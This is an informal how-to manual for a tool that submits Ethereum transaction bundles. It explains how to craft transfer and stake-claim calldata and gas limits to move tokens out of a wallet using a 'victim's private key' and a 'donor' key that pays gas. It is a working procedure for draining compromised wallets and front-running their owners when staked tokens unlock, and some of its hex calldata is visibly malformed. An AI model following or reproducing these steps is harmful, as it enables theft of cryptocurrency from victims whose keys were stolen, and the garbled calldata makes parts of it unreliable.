October 17

MAnual for eth bundle

for example, to withdraw a token

0x

0x

TRANS|0xcontract|100_000|0xdata

so how we do it for a token,

go to metamask or rabbi from this address

import the token we want to withdraw there

click on it and click send

then select - EXACTLY YOUR OTHER ADDRESS

click next

write the amount of token, usually max. put it and press next

a transaction opens, if metamask - press hex - and pull out hex data, it looks something like this 0х00000832526 long bullshit

this is the data, put it at the end

then the commission, in the transaction in the same one press the blue pencil and press advanced

there it says gas limit in blue below

for example it says 48880 you write here x2-x2.5 value

you get 100_000

if it says 125000 for example, you write 250_000 in the software

in rabby wallet it's the same, only to get the data you press view raw

and there will be a transaction and it will give the data

with nft it's the same situation like a token

.

Templates in tempalate.keys

now a stake

.........

0x

0x

TRANS|0xcontract|100_000|0xdata - FOR STAKES

TRANS|0xcontract|100_000|0xdata - FOR TOKEN

SO THAT BLOCK INTO BLOCK WAS

how to get stake contract gas and data

you go to the claim page

press claim

exits trans

there will be a contract on top where the request is made

there it usually says like this

!CLAIM

take the contract and insert then similarly take the gas limit x2

and the transaction data, absolutely the same

all now what do we do you don't have this token accordingly

you import it into metamask

try to select an address

enter the amount that will unlock from the stake

it is advisable not to write 485,3256

but simply 485

or even better 480

so that there is a reserve

then your address

and also for the transfer you pull everything out

BUT

sometimes it happens that the token immediately has a price, but this is mainly for popular tokens, the wormhole is unlikely to be like this at first

BUT!

if it did happen, we'll have to fuck a little

what are you doing -

I went to etherscan

https://etherscan.io/address/0x14fee680690900ba0cccfc76ad70fd1b95d10e16

of this token

enter the hash of any transaction which took place

https://etherscan.io/tx/0x7f169cc37ab3abcb0f4946fdf8b2bd5d19c76010b9ed0fc38f937d63ac844a2f

here's an example of a transaction

scroll where the gas is press click to show more

click here

and choose original

here is the data of the left transaction

here is the data of the left transaction

see the address where it is sent

here it is

it is simply inserted without 0x here

everything after the address

these zeros go

this is the amount of the token

I go to the token contract page

here writes 9 Decimals

https://etherscan.io/unitconverter

I write the value 93 in ether

and you see 10^-9

the power is negative

these are decimals

I copy this value

93000000000

https://www.moesif.com/solidity-abi-hex-decoder/encode

I'm moving here

I paste in the first line this value

and from the bottom select Unit256

I press encode

0x000000000000000000000000000000000000000000000000000000015a73b6200

I get this value

removing that 0x

000000000000000000000000000000000000000000000000000000015a73b6200

going back to data

0xa9059cbb00000000000000000000000000008D144e67232d30effC916C3C89b1f199a0BCdB0 00015a73b6200 is the sum

0x08D144e67232d30effC916C3C89b1f199a0BCdB0

address to output

0xa9059cbb00000000000000000000000000008D144e67232d30effC916C3C89b1f199a0BCdB0 00015a73b6200

so

TRANS|0xb04Af4843e3808e1FE6F7A8ee4F456937D7Afae8|250_000|0x372500ab
TRANS|0x14feE680690900BA0ccCfC76AD70Fd1b95D10e16|150_000|0xa9059cbb00000000000000000000000008D144e67232d300000000000000008D144e67232d3 000000000000000000000000000000000000000000000000000015a73b6200

Donor Private Key
victim's private key
TRANS|0xb04Af4843e3808e1FE6F7A8ee4F456937D7Afae8|250_000|0x372500ab
TRANS|0x14feE680690900BA0ccCfC76AD70Fd1b95D10e16|150_000|0xa9059cbb00000000000000000000000008D144e67232d300000000000000008D144e67232d3 000000000000000000000000000000000000000000000000000015a73b6200

Also u need replace infura key in config - config file to ur own